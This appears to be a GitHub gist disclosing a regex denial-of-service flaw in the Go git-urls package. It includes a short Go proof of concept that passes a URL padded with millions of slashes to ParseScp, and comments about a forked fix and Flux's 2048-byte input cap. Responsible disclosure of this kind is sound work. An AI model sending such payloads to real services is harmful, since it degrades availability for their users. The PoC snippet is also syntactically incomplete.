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Last active December 5, 2023 17:12
Security issue in regex inside git-urls package
- v1.0.0
- v1.0.0
- Status: not fixed
- Regex Denial of Service
The regex on line 35. inside urls.go is vulnerable to regex denial of service when a long input is provided inside
directory path of the git url.
It is possible to cause a 7s delay but only because the payload in the url was to long. Here is the PoC:
var payload = strings.Repeat("////", 19000000) //payload used, the number can be tweaked to cause 7 second delay
malicious_url := "6en6ar@-:0////" + payload + "\"
begin := time.Now()
//u, err := giturls.ParseScp("remote_username@")// normal git url
_, err := giturls.ParseScp(malicious_url)
if err != nil {
fmt.Errorf("[ - ] Error ->" + err.Error())
//fmt.Println("[ + ] Url --> " + u.Host)
elapse := time.Since(begin)
fmt.Printf("Function took %s", elapse)
This vulnerbale regex causes the application to take longer time in parsing the input.
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makkes commented Nov 28, 2023

There is no version 1.0.1 of the git-urls library.

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6en6ar commented Nov 28, 2023

Thanks for noticing. I updated the version in the description.

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@makkes We've moved the repo to our organization and fixed the current issue. Please, check

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makkes commented Dec 5, 2023

Thanks for the heads-up, @hectorj2f! Is the goal to keep maintaining the lib there or just as long as a fix version hasn't been released upstream?

As a side note, we fixed it in Flux by limiting the URL string we pass to git-urls to a 2048 bytes.

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Yes, we'll keep maintaining our copy independently of what upstream repo does. It currently looks unmaintained for the moment.

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